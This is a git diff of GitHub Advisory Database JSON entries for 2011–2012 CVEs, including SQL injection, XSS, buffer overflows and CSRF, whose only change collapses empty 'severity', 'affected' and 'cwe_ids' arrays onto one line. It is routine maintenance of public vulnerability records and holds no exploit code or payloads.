+7,8 @@ "CVE-2012-3924" ], "details": "The SSLVPN implementation in Cisco IOS 15.1 and 15.2, when DTLS is enabled, does not properly handle certain outbound ACL configurations, which allows remote authenticated users to cause a denial of service (device crash) via a session involving a PPP over ATM (PPPoA) interface, aka Bug ID CSCty97961.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r84c-ppfc-cj9g/GHSA-r84c-ppfc-cj9g.json b/advisories/unreviewed/2022/05/GHSA-r84c-ppfc-cj9g/GHSA-r84c-ppfc-cj9g.json index f0481500f70..27e1c160ac1 100644 --- a/advisories/unreviewed/2022/05/GHSA-r84c-ppfc-cj9g/GHSA-r84c-ppfc-cj9g.json +++ b/advisories/unreviewed/2022/05/GHSA-r84c-ppfc-cj9g/GHSA-r84c-ppfc-cj9g.json @@ -7,12 +7,8 @@ "CVE-2012-2376" ], "details": "Buffer overflow in the com_print_typeinfo function in PHP 5.4.3 and earlier on Windows allows remote attackers to execute arbitrary code via crafted arguments that trigger incorrect handling of COM object VARIANT types, as exploited in the wild in May 2012.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r879-q82r-5432/GHSA-r879-q82r-5432.json b/advisories/unreviewed/2022/05/GHSA-r879-q82r-5432/GHSA-r879-q82r-5432.json index 784a908da24..713e6d5f5db 100644 --- a/advisories/unreviewed/2022/05/GHSA-r879-q82r-5432/GHSA-r879-q82r-5432.json +++ b/advisories/unreviewed/2022/05/GHSA-r879-q82r-5432/GHSA-r879-q82r-5432.json @@ -7,12 +7,8 @@ "CVE-2012-0728" ], "details": "SQL injection vulnerability in IBM Maximo Asset Management 7.1 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r99x-5v7g-2wmf/GHSA-r99x-5v7g-2wmf.json b/advisories/unreviewed/2022/05/GHSA-r99x-5v7g-2wmf/GHSA-r99x-5v7g-2wmf.json index 1f3933b30ed..826fdb81c9d 100644 --- a/advisories/unreviewed/2022/05/GHSA-r99x-5v7g-2wmf/GHSA-r99x-5v7g-2wmf.json +++ b/advisories/unreviewed/2022/05/GHSA-r99x-5v7g-2wmf/GHSA-r99x-5v7g-2wmf.json @@ -7,12 +7,8 @@ "CVE-2012-4036" ], "details": "Unrestricted file upload vulnerability in admin.php in PBBoard 2.1.4 allows remote administrators to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a direct request to the file in the addons directory. NOTE: this vulnerability can be leveraged by remote attackers using CVE-2012-1216.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r9gw-49fr-p9j4/GHSA-r9gw-49fr-p9j4.json b/advisories/unreviewed/2022/05/GHSA-r9gw-49fr-p9j4/GHSA-r9gw-49fr-p9j4.json index e3df2b5b16d..efcc4206135 100644 --- a/advisories/unreviewed/2022/05/GHSA-r9gw-49fr-p9j4/GHSA-r9gw-49fr-p9j4.json +++ b/advisories/unreviewed/2022/05/GHSA-r9gw-49fr-p9j4/GHSA-r9gw-49fr-p9j4.json @@ -7,12 +7,8 @@ "CVE-2011-5227" ], "details": "Stack-based buffer overflow in the Syslog service (nssyslogd.exe) in Enterasys Network Management Suite (NMS) before 4.1.0.80 allows remote attackers to execute arbitrary code via a long PRIO field in a message to UDP port 514.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r9hm-xqmv-vp84/GHSA-r9hm-xqmv-vp84.json b/advisories/unreviewed/2022/05/GHSA-r9hm-xqmv-vp84/GHSA-r9hm-xqmv-vp84.json index 7512175b4ba..f03a24c5c7f 100644 --- a/advisories/unreviewed/2022/05/GHSA-r9hm-xqmv-vp84/GHSA-r9hm-xqmv-vp84.json +++ b/advisories/unreviewed/2022/05/GHSA-r9hm-xqmv-vp84/GHSA-r9hm-xqmv-vp84.json @@ -7,12 +7,8 @@ "CVE-2012-2322" ], "details": "Integer overflow in the dhcpv6_get_option function in gdhcp/client.c in ConnMan before 0.85 allows remote attackers to cause a denial of service (infinite loop and crash) via an invalid length value in a DHCP packet.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r9r3-j3f2-cx97/GHSA-r9r3-j3f2-cx97.json b/advisories/unreviewed/2022/05/GHSA-r9r3-j3f2-cx97/GHSA-r9r3-j3f2-cx97.json index c37bd058de8..b1647c95aed 100644 --- a/advisories/unreviewed/2022/05/GHSA-r9r3-j3f2-cx97/GHSA-r9r3-j3f2-cx97.json +++ b/advisories/unreviewed/2022/05/GHSA-r9r3-j3f2-cx97/GHSA-r9r3-j3f2-cx97.json @@ -7,12 +7,8 @@ "CVE-2012-3895" ], "details": "Cisco IOS 15.0 through 15.3 allows remote authenticated users to cause a denial of service (device crash) via an MVPNv6 update, aka Bug ID CSCty89224.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r9v5-pj68-rfgc/GHSA-r9v5-pj68-rfgc.json b/advisories/unreviewed/2022/05/GHSA-r9v5-pj68-rfgc/GHSA-r9v5-pj68-rfgc.json index 131ee6e6c92..401d1f791dd 100644 --- a/advisories/unreviewed/2022/05/GHSA-r9v5-pj68-rfgc/GHSA-r9v5-pj68-rfgc.json +++ b/advisories/unreviewed/2022/05/GHSA-r9v5-pj68-rfgc/GHSA-r9v5-pj68-rfgc.json @@ -7,12 +7,8 @@ "CVE-2012-1074" ], "details": "SQL injection vulnerability in the White Papers (mm_whtppr) extension 0.0.4 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rcm3-pv3r-j8p9/GHSA-rcm3-pv3r-j8p9.json b/advisories/unreviewed/2022/05/GHSA-rcm3-pv3r-j8p9/GHSA-rcm3-pv3r-j8p9.json index ffbb5d867d6..72672939ae3 100644 --- a/advisories/unreviewed/2022/05/GHSA-rcm3-pv3r-j8p9/GHSA-rcm3-pv3r-j8p9.json +++ b/advisories/unreviewed/2022/05/GHSA-rcm3-pv3r-j8p9/GHSA-rcm3-pv3r-j8p9.json @@ -7,12 +7,8 @@ "CVE-2012-3267" ], "details": "Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.20 allows remote attackers to obtain sensitive information via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rf7m-8c9f-5c53/GHSA-rf7m-8c9f-5c53.json b/advisories/unreviewed/2022/05/GHSA-rf7m-8c9f-5c53/GHSA-rf7m-8c9f-5c53.json index 69dd9c08576..60e38b79b64 100644 --- a/advisories/unreviewed/2022/05/GHSA-rf7m-8c9f-5c53/GHSA-rf7m-8c9f-5c53.json +++ b/advisories/unreviewed/2022/05/GHSA-rf7m-8c9f-5c53/GHSA-rf7m-8c9f-5c53.json @@ -7,12 +7,8 @@ "CVE-2011-5201" ], "details": "Multiple SQL injection vulnerabilities in sign.php in tinyguestbook allow remote attackers to execute arbitrary SQL commands via the (1) name and (2) msg parameters. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rfxv-8ghr-g333/GHSA-rfxv-8ghr-g333.json b/advisories/unreviewed/2022/05/GHSA-rfxv-8ghr-g333/GHSA-rfxv-8ghr-g333.json index 50c99e1e687..7244562f29a 100644 --- a/advisories/unreviewed/2022/05/GHSA-rfxv-8ghr-g333/GHSA-rfxv-8ghr-g333.json +++ b/advisories/unreviewed/2022/05/GHSA-rfxv-8ghr-g333/GHSA-rfxv-8ghr-g333.json @@ -7,12 +7,8 @@ "CVE-2012-0907" ], "details": "Directory traversal vulnerability in the web player in NeoAxis NeoAxis web player 1.4 and earlier allows user-assisted remote attackers to write arbitrary files via a .. (dot dot) in a filename in the neoaxis_web_application_win32.zip ZIP archive.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rg6m-38gv-95mx/GHSA-rg6m-38gv-95mx.json b/advisories/unreviewed/2022/05/GHSA-rg6m-38gv-95mx/GHSA-rg6m-38gv-95mx.json index 05bf4e3c030..87a7f537f9d 100644 --- a/advisories/unreviewed/2022/05/GHSA-rg6m-38gv-95mx/GHSA-rg6m-38gv-95mx.json +++ b/advisories/unreviewed/2022/05/GHSA-rg6m-38gv-95mx/GHSA-rg6m-38gv-95mx.json @@ -7,12 +7,8 @@ "CVE-2012-2075" ], "details": "Cross-site scripting (XSS) vulnerability in the Contact Save module 6.x-1.x before 6.x-1.5 for Drupal allows remote authenticated users with the access site-wide contact form permission to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rh24-rxj5-hccw/GHSA-rh24-rxj5-hccw.json b/advisories/unreviewed/2022/05/GHSA-rh24-rxj5-hccw/GHSA-rh24-rxj5-hccw.json index f41ae042d8f..07d68f79fe0 100644 --- a/advisories/unreviewed/2022/05/GHSA-rh24-rxj5-hccw/GHSA-rh24-rxj5-hccw.json +++ b/advisories/unreviewed/2022/05/GHSA-rh24-rxj5-hccw/GHSA-rh24-rxj5-hccw.json @@ -7,12 +7,8 @@ "CVE-2012-1184" ], "details": "Stack-based buffer overflow in the ast_parse_digest function in main/utils.c in Asterisk 1.8.x before 1.8.10.1 and 10.x before 10.2.1 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long string in an HTTP Digest Authentication header.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rhh5-9h8g-3cxm/GHSA-rhh5-9h8g-3cxm.json b/advisories/unreviewed/2022/05/GHSA-rhh5-9h8g-3cxm/GHSA-rhh5-9h8g-3cxm.json index 867b8c1b536..50995188588 100644 --- a/advisories/unreviewed/2022/05/GHSA-rhh5-9h8g-3cxm/GHSA-rhh5-9h8g-3cxm.json +++ b/advisories/unreviewed/2022/05/GHSA-rhh5-9h8g-3cxm/GHSA-rhh5-9h8g-3cxm.json @@ -7,12 +7,8 @@ "CVE-2011-5233" ], "details": "Heap-based buffer overflow in IrfanView before 4.32 allows remote attackers to execute arbitrary code via crafted \"Rows Per Strip\" and \"Samples Per Pixel\" values in a TIFF image file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rjpc-3ppq-gvmj/GHSA-rjpc-3ppq-gvmj.json b/advisories/unreviewed/2022/05/GHSA-rjpc-3ppq-gvmj/GHSA-rjpc-3ppq-gvmj.json index fae454160bc..f9de345f1f3 100644 --- a/advisories/unreviewed/2022/05/GHSA-rjpc-3ppq-gvmj/GHSA-rjpc-3ppq-gvmj.json +++ b/advisories/unreviewed/2022/05/GHSA-rjpc-3ppq-gvmj/GHSA-rjpc-3ppq-gvmj.json @@ -7,12 +7,8 @@ "CVE-2012-1051" ], "details": "Heap-based buffer overflow in Xjp2.dll in the JPEG2000 plug-in in XnView 1.98.5 allows remote attackers to execute arbitrary code via a JPEG2000 (JP2) file with a crafted Quantization Default (QCD) marker segment.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rm2j-qj3x-w2rg/GHSA-rm2j-qj3x-w2rg.json b/advisories/unreviewed/2022/05/GHSA-rm2j-qj3x-w2rg/GHSA-rm2j-qj3x-w2rg.json index 9cd13cdd8bc..76719021416 100644 --- a/advisories/unreviewed/2022/05/GHSA-rm2j-qj3x-w2rg/GHSA-rm2j-qj3x-w2rg.json +++ b/advisories/unreviewed/2022/05/GHSA-rm2j-qj3x-w2rg/GHSA-rm2j-qj3x-w2rg.json @@ -7,12 +7,8 @@ "CVE-2012-2169" ], "details": "Cross-site scripting (XSS) vulnerability in the file-upload functionality in the Web client in IBM Rational ClearQuest 7.1.x before 7.1.2.7 allows remote authenticated users to inject arbitrary web script or HTML via the File Description field.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rmmm-6vv2-783p/GHSA-rmmm-6vv2-783p.json b/advisories/unreviewed/2022/05/GHSA-rmmm-6vv2-783p/GHSA-rmmm-6vv2-783p.json index cdab37d0253..b643a4b0a53 100644 --- a/advisories/unreviewed/2022/05/GHSA-rmmm-6vv2-783p/GHSA-rmmm-6vv2-783p.json +++ b/advisories/unreviewed/2022/05/GHSA-rmmm-6vv2-783p/GHSA-rmmm-6vv2-783p.json @@ -7,12 +7,8 @@ "CVE-2011-5177" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in admin/controller.php in eSyndiCat Pro 2.3.05 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to the admins (2) blocks, (3) articles, or (4) suggest-category; or (5) sort parameter to the search page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rp6p-jv9g-hhv5/GHSA-rp6p-jv9g-hhv5.json b/advisories/unreviewed/2022/05/GHSA-rp6p-jv9g-hhv5/GHSA-rp6p-jv9g-hhv5.json index fc30a9dc104..1597f6d8837 100644 --- a/advisories/unreviewed/2022/05/GHSA-rp6p-jv9g-hhv5/GHSA-rp6p-jv9g-hhv5.json +++ b/advisories/unreviewed/2022/05/GHSA-rp6p-jv9g-hhv5/GHSA-rp6p-jv9g-hhv5.json @@ -7,12 +7,8 @@ "CVE-2012-3295" ], "details": "IBM WebSphere MQ 7.1, when an SVRCONN channel is used, allows remote attackers to bypass the security-configuration setup step and obtain queue-manager access via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rpfv-8h77-x742/GHSA-rpfv-8h77-x742.json b/advisories/unreviewed/2022/05/GHSA-rpfv-8h77-x742/GHSA-rpfv-8h77-x742.json index 5109bf9c196..3c4cfa60f5e 100644 --- a/advisories/unreviewed/2022/05/GHSA-rpfv-8h77-x742/GHSA-rpfv-8h77-x742.json +++ b/advisories/unreviewed/2022/05/GHSA-rpfv-8h77-x742/GHSA-rpfv-8h77-x742.json @@ -7,12 +7,8 @@ "CVE-2012-0765" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Adobe RoboHelp 8 and 9 for Word allow remote attackers to inject arbitrary web script or HTML via a crafted URL, related to certain .htm files in (1) template_stock and (2) template_csh directories.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rph2-33pr-67ww/GHSA-rph2-33pr-67ww.json b/advisories/unreviewed/2022/05/GHSA-rph2-33pr-67ww/GHSA-rph2-33pr-67ww.json index 47739a21fbb..a10aa283298 100644 --- a/advisories/unreviewed/2022/05/GHSA-rph2-33pr-67ww/GHSA-rph2-33pr-67ww.json +++ b/advisories/unreviewed/2022/05/GHSA-rph2-33pr-67ww/GHSA-rph2-33pr-67ww.json @@ -7,12 +7,8 @@ "CVE-2012-1106" ], "details": "The C handler plug-in in Automatic Bug Reporting Tool (ABRT), possibly 2.0.8 and earlier, does not properly set the group (GID) permissions on core dump files for setuid programs when the sysctl fs.suid_dumpable option is set to 2, which allows local users to obtain sensitive information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rpmx-xcm7-5crg/GHSA-rpmx-xcm7-5crg.json b/advisories/unreviewed/2022/05/GHSA-rpmx-xcm7-5crg/GHSA-rpmx-xcm7-5crg.json index dcd1c19460c..16a71a29bd2 100644 --- a/advisories/unreviewed/2022/05/GHSA-rpmx-xcm7-5crg/GHSA-rpmx-xcm7-5crg.json +++ b/advisories/unreviewed/2022/05/GHSA-rpmx-xcm7-5crg/GHSA-rpmx-xcm7-5crg.json @@ -7,12 +7,8 @@ "CVE-2012-3441" ], "details": "The database creation script (module/idoutils/db/scripts/create_mysqldb.sh) in Icinga 1.7.1 grants access to all databases to the icinga user, which allows icinga users to access other databases via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rr66-pqp9-7m9f/GHSA-rr66-pqp9-7m9f.json b/advisories/unreviewed/2022/05/GHSA-rr66-pqp9-7m9f/GHSA-rr66-pqp9-7m9f.json index 4818455554d..77f8f4875ac 100644 --- a/advisories/unreviewed/2022/05/GHSA-rr66-pqp9-7m9f/GHSA-rr66-pqp9-7m9f.json +++ b/advisories/unreviewed/2022/05/GHSA-rr66-pqp9-7m9f/GHSA-rr66-pqp9-7m9f.json @@ -7,12 +7,8 @@ "CVE-2012-0846" ], "details": "Cross-site scripting (XSS) vulnerability in Craig Knudsen WebCalendar 1.2.4 allows remote attackers to inject arbitrary web script or HTML via the Location variable.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rrfm-6fhw-cr65/GHSA-rrfm-6fhw-cr65.json b/advisories/unreviewed/2022/05/GHSA-rrfm-6fhw-cr65/GHSA-rrfm-6fhw-cr65.json index 825702461c4..e07ed1a4e72 100644 --- a/advisories/unreviewed/2022/05/GHSA-rrfm-6fhw-cr65/GHSA-rrfm-6fhw-cr65.json +++ b/advisories/unreviewed/2022/05/GHSA-rrfm-6fhw-cr65/GHSA-rrfm-6fhw-cr65.json @@ -7,12 +7,8 @@ "CVE-2012-1069" ], "details": "Cross-site scripting (XSS) vulnerability in module/kb/search_word in the search module in lknSupport allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rv5x-2jxm-gf9c/GHSA-rv5x-2jxm-gf9c.json b/advisories/unreviewed/2022/05/GHSA-rv5x-2jxm-gf9c/GHSA-rv5x-2jxm-gf9c.json index 2343b81686a..eb16c7b818b 100644 --- a/advisories/unreviewed/2022/05/GHSA-rv5x-2jxm-gf9c/GHSA-rv5x-2jxm-gf9c.json +++ b/advisories/unreviewed/2022/05/GHSA-rv5x-2jxm-gf9c/GHSA-rv5x-2jxm-gf9c.json @@ -7,12 +7,8 @@ "CVE-2012-3547" ], "details": "Stack-based buffer overflow in the cbtls_verify function in FreeRADIUS 2.1.10 through 2.1.12, when using TLS-based EAP methods, allows remote attackers to cause a denial of service (server crash) and possibly execute arbitrary code via a long \"not after\" timestamp in a client certificate.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rv85-gfr9-mfh9/GHSA-rv85-gfr9-mfh9.json b/advisories/unreviewed/2022/05/GHSA-rv85-gfr9-mfh9/GHSA-rv85-gfr9-mfh9.json index b9cc3b731da..f5913c0ed4d 100644 --- a/advisories/unreviewed/2022/05/GHSA-rv85-gfr9-mfh9/GHSA-rv85-gfr9-mfh9.json +++ b/advisories/unreviewed/2022/05/GHSA-rv85-gfr9-mfh9/GHSA-rv85-gfr9-mfh9.json @@ -7,12 +7,8 @@ "CVE-2012-0696" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Executive Viewer (EV) in IBM Cognos TM1 before 9.5 FP1 allow remote attackers to inject arbitrary web script or HTML via unspecified requests to (1) aspnet_client or (2) evserver/createcontrol.js.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rv96-cwm8-v64c/GHSA-rv96-cwm8-v64c.json b/advisories/unreviewed/2022/05/GHSA-rv96-cwm8-v64c/GHSA-rv96-cwm8-v64c.json index 9ac1183d6c6..67350f6e0f1 100644 --- a/advisories/unreviewed/2022/05/GHSA-rv96-cwm8-v64c/GHSA-rv96-cwm8-v64c.json +++ b/advisories/unreviewed/2022/05/GHSA-rv96-cwm8-v64c/GHSA-rv96-cwm8-v64c.json @@ -7,12 +7,8 @@ "CVE-2012-0990" ], "details": "Cross-site request forgery (CSRF) vulnerability in admin/settings/update in DClassifieds 0.1 final allows remote attackers to hijack the authentication of administrators for requests that modify account settings such as the administrator password or email via certain Settings[] parameters.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rwmw-fm56-fc54/GHSA-rwmw-fm56-fc54.json b/advisories/unreviewed/2022/05/GHSA-rwmw-fm56-fc54/GHSA-rwmw-fm56-fc54.json index 31543144f6c..cfb0e143fcf 100644 --- a/advisories/unreviewed/2022/05/GHSA-rwmw-fm56-fc54/GHSA-rwmw-fm56-fc54.json +++ b/advisories/unreviewed/2022/05/GHSA-rwmw-fm56-fc54/GHSA-rwmw-fm56-fc54.json @@ -7,12 +7,8 @@ "CVE-2012-2074" ], "details": "Unspecified vulnerability in certain default views in the Ubercart Views module 6.x before 6.x-3.2 for Drupal allows remote attackers to obtain sensitive information via unknown attack vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rwpv-8qwc-53j8/GHSA-rwpv-8qwc-53j8.json b/advisories/unreviewed/2022/05/GHSA-rwpv-8qwc-53j8/GHSA-rwpv-8qwc-53j8.json index 9a081a71f0d..35407210203 100644 --- a/advisories/unreviewed/2022/05/GHSA-rwpv-8qwc-53j8/GHSA-rwpv-8qwc-53j8.json +++ b/advisories/unreviewed/2022/05/GHSA-rwpv-8qwc-53j8/GHSA-rwpv-8qwc-53j8.json @@ -7,12 +7,8 @@ "CVE-2012-3839" ], "details": "Multiple SQL injection vulnerabilities in application/core/MY_Model.php in MyClientBase 0.12 allow remote attackers to execute arbitrary SQL commands via the (1) invoice_number or (2) tags parameter to index.php/invoice_search.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rx6w-7424-25q4/GHSA-rx6w-7424-25q4.json b/advisories/unreviewed/2022/05/GHSA-rx6w-7424-25q4/GHSA-rx6w-7424-25q4.json index ac18bbd35e3..848f94d8dca 100644 --- a/advisories/unreviewed/2022/05/GHSA-rx6w-7424-25q4/GHSA-rx6w-7424-25q4.json +++ b/advisories/unreviewed/2022/05/GHSA-rx6w-7424-25q4/GHSA-rx6w-7424-25q4.json @@ -7,12 +7,8 @@ "CVE-2012-2935" ], "details": "Cross-site scripting (XSS) vulnerability in osCommerce/OM/Core/Site/Shop/Application/Checkout/pages/main.php in OSCommerce Online Merchant 3.0.2 allows remote attackers to inject arbitrary web script or HTML via the value_title parameter, a different vulnerability than CVE-2012-1059.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rx7r-jqpc-3722/GHSA-rx7r-jqpc-3722.json b/advisories/unreviewed/2022/05/GHSA-rx7r-jqpc-3722/GHSA-rx7r-jqpc-3722.json index 9d695fb3913..3aebbdfb123 100644 --- a/advisories/unreviewed/2022/05/GHSA-rx7r-jqpc-3722/GHSA-rx7r-jqpc-3722.json +++ b/advisories/unreviewed/2022/05/GHSA-rx7r-jqpc-3722/GHSA-rx7r-jqpc-3722.json @@ -7,12 +7,8 @@ "CVE-2012-0747" ], "details": "SQL injection vulnerability in IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v22f-x3qj-f766/GHSA-v22f-x3qj-f766.json b/advisories/unreviewed/2022/05/GHSA-v22f-x3qj-f766/GHSA-v22f-x3qj-f766.json index 3a99dcd4d69..a82f5f611ae 100644 --- a/advisories/unreviewed/2022/05/GHSA-v22f-x3qj-f766/GHSA-v22f-x3qj-f766.json +++ b/advisories/unreviewed/2022/05/GHSA-v22f-x3qj-f766/GHSA-v22f-x3qj-f766.json @@ -7,12 +7,8 @@ "CVE-2012-2190" ], "details": "IBM Global Security Kit (aka GSKit), as used in IBM HTTP Server in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.45, 7.0.x before 7.0.0.25, 8.0.x before 8.0.0.4, and 8.5.x before 8.5.0.1, allows remote attackers to cause a denial of service (daemon crash) via a crafted ClientHello message in the TLS Handshake Protocol.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v48x-vfq3-xh4h/GHSA-v48x-vfq3-xh4h.json b/advisories/unreviewed/2022/05/GHSA-v48x-vfq3-xh4h/GHSA-v48x-vfq3-xh4h.json index c2992d24dc1..e6e08e196a5 100644 --- a/advisories/unreviewed/2022/05/GHSA-v48x-vfq3-xh4h/GHSA-v48x-vfq3-xh4h.json +++ b/advisories/unreviewed/2022/05/GHSA-v48x-vfq3-xh4h/GHSA-v48x-vfq3-xh4h.json @@ -7,12 +7,8 @@ "CVE-2012-3844" ], "details": "Cross-site scripting (XSS) vulnerability in vBulletin 4.1.12 allows remote attackers to inject arbitrary web script or HTML via a long string in the subject parameter when creating a post.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v49p-p426-xv6r/GHSA-v49p-p426-xv6r.json b/advisories/unreviewed/2022/05/GHSA-v49p-p426-xv6r/GHSA-v49p-p426-xv6r.json index fb7d2c88592..f9d1af781ba 100644 --- a/advisories/unreviewed/2022/05/GHSA-v49p-p426-xv6r/GHSA-v49p-p426-xv6r.json +++ b/advisories/unreviewed/2022/05/GHSA-v49p-p426-xv6r/GHSA-v49p-p426-xv6r.json @@ -7,12 +7,8 @@ "CVE-2011-5223" ], "details": "Cross-site request forgery (CSRF) vulnerability in logout.php in Cacti before 0.8.7i allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v4rc-394x-wh8w/GHSA-v4rc-394x-wh8w.json b/advisories/unreviewed/2022/05/GHSA-v4rc-394x-wh8w/GHSA-v4rc-394x-wh8w.json index 9d2c07acb2f..2dcdbbf9a3a 100644 --- 